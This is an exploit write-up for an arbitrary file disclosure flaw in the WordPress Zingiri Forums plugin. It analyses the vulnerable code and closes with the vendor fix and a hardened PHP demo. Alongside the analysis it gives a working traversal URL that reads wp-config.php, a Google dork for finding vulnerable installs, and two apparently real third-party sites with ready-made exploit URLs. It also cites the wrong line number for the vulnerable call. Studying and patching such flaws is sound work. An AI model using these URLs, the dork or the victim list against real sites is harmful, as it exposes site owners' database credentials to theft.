Exploiting the arbitrary file disclosure vulnerability in the 'url' parameter of the WordPress Zingiri Forums plugin

References:

WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/

Secunia Advisory SA50833
http://secunia.com/advisories/50833/


Analysis of vulnerability

The Zingiri Web Forums plugin for WordPress writes out a header for the forum in forum.php by adding an action to wp_head.

44    add_action('wp_head','zing_forum_header'); 

686    function zing_forum_header()
687    {
688        global $zing_forum_content;
689        global $zing_forum_menu;
690        $output=zing_forum_output("content");
691     
692        zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
693        zing_integrator_cut($output,'<span class="forgot_password">','</span>');
694     
695        $zing_forum_content=$output;
696     
697        echo '<script type="text/javascript" language="javascript">';
698        echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
699        echo "var zing_forum_index='".get_option('home')."/index.php?';";
700        echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
701        echo '</script>';
702     
703        echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
704    } 

So on each load of the WordPress blog it calls into zing_forum_header. The first call that function makes is into zing_forum_output, which is rather long. I’ve highlighted two areas:

456    function zing_forum_output($process) {
457        global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;
458     
459        $postVar=array();
460        switch ($process)
461        {
462            case "content":
463        if (isset($post)) $cf=get_post_custom($post->ID);
464        if (isset($_GET['zforum']))
465        {
466            $zing_forum_to_include=$_GET['zforum'];
467            $zing_forum_mode="forum";
468        } 

We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a long if/elseif chain. Here is the block of code that is executed if we set that variable to css:

541    } elseif ($zing_forum_to_include=='css') {
542            ob_end_clean();
543            if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
544            else $key=$_GET['url'];
545            if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546                $output=$_SESSION['ccforum']['stylesheet'][$key];
547            } else {
548                if (isset($_GET['stylesheet'])) {
549                    $http=zing_forum_http("mybb",'css.php',"");
550                    $news = new zHttpRequest($http,'zingiri-forum');
551                    if (!$news->curlInstalled()) return "cURL not installed";
552                    elseif (!$news->live()) return "A HTTP Error occured";
553                    $output=$news->DownloadToString();
554                    $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);
555     
556                } elseif ($_GET['url']) {
557                    $url=$_GET['url'];
558                    $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url); // 'url' is concatenated into the path unfiltered
559                }
560                $f[]='/^body.*{(.*?)/';
561                $r[]=' {$1';
562                $f[]='/.zingbody/';
563                $r[]='';
564                $f[]='/(.*?).{(.*?)/';
565                $r[]='.ccforum $1 {$2';
566                $f[]='/(.*?),(.*?).{(.*?)/';
567                $r[]='$1,.ccforum $2 {$3';
568                $f[]='/(.*?),(.*?),(.*?).{(.*?)/';
569                $r[]='$1,$2,.ccforum $3 {$4';
570                $output=preg_replace($f,$r,$output,-1,$count);
571                if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
572            }
573            header("Content-type: text/css");
574            echo $output;
575            die();

If we don’t set anything except the “url” GET variable, its value is fed straight into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:

http://URL/wordpress/?zforum=css&url=../../../../../../wp-config.php


Google dork: inurl:plugins/zingiri-forum

Affected sites found:
http://themakeupmorgue.com/?zforum=css&url=../../../../../../wp-config.php
http://www.4newdesign.com/?zforum=css&url=../../../../../../wp-config.php

The fix:

Version 1.4.2 compared with version 1.4.4:
557    $url=$_GET['url'];
was changed to
555        $url=str_replace('..','',$_GET['url']);

This strips “..” from the parameter, so the path can no longer climb into a parent directory.
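To make the difference between the three versions of this lookup concrete, here is an added example (written for this article, not code from the Zingiri plugin): it recreates the 1.4.2 concatenation, the 1.4.4 str_replace filter, and a hardened variant of our own that keeps only an allow-listed base name and checks the resolved path with realpath(). All file names, contents and the scratch directory are constructed for the demo; the function names are assumptions.

```php
<?php
// Added example, not plugin code. A scratch directory stands in for
// ZING_MYBB_DIR.'/cache/themes/'; file names and contents are constructed.

function make_fixture(): string {
    $base = sys_get_temp_dir() . '/zing_demo_' . bin2hex(random_bytes(4));
    mkdir("$base/cache/themes", 0700, true);
    file_put_contents("$base/cache/themes/default.css", "body { color: #000; }\n");
    // Stands in for wp-config.php: it lives outside the themes directory.
    file_put_contents("$base/wp-config.php",
        "<?php define('DB_PASSWORD', 'constructed-secret');\n");
    return $base;
}

// 1.4.2 behaviour: the parameter is concatenated straight into the path.
function load_vulnerable(string $themesDir, string $url) {
    return @file_get_contents($themesDir . '/' . $url);
}

// 1.4.4 behaviour: remove '..' before concatenating (a blacklist on one token).
function load_144(string $themesDir, string $url) {
    $url = str_replace('..', '', $url);
    return @file_get_contents($themesDir . '/' . $url);
}

// Hardened variant (our suggestion, not the plugin's): reduce the input to a
// base name of an allow-listed shape, then confirm that the resolved path still
// sits directly under the themes directory after symlinks are followed.
function load_hardened(string $themesDir, string $url) {
    $name = basename($url);
    if (!preg_match('/^[A-Za-z0-9_-]+\.css$/', $name)) {
        return false;   // anything that is not a plain .css file name is rejected
    }
    $root = realpath($themesDir);
    $path = realpath($themesDir . '/' . $name);
    if ($root === false || $path === false) {
        return false;   // directory or file does not exist
    }
    if (dirname($path) !== $root) {
        return false;   // containment check failed
    }
    return file_get_contents($path);
}

function run_demo(): array {
    $base   = make_fixture();
    $themes = "$base/cache/themes";
    $traversal = '../../wp-config.php';   // constructed traversal-style input
    $results = [
        'vulnerable_leaks'     => strpos((string) load_vulnerable($themes, $traversal), 'DB_PASSWORD') !== false,
        '144_blocks'           => load_144($themes, $traversal) === false,
        'hardened_blocks'      => load_hardened($themes, $traversal) === false,
        'hardened_serves_css'  => load_hardened($themes, 'default.css') !== false,
        'hardened_rejects_php' => load_hardened($themes, 'wp-config.php') === false,
    ];
    // Clean up the scratch directory.
    unlink("$themes/default.css");
    unlink("$base/wp-config.php");
    rmdir($themes);
    rmdir("$base/cache");
    rmdir($base);
    return $results;
}

print_r(run_demo());   // every entry should be true
```

Run it with `php demo.php`. The point of the hardened variant is not that the 1.4.4 filter fails on this input (it does block the traversal above); it is that str_replace only removes one token and still trusts whatever remains, whereas basename() plus a realpath() containment check verifies the property the code actually needs: the file being served is a stylesheet inside the themes cache.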
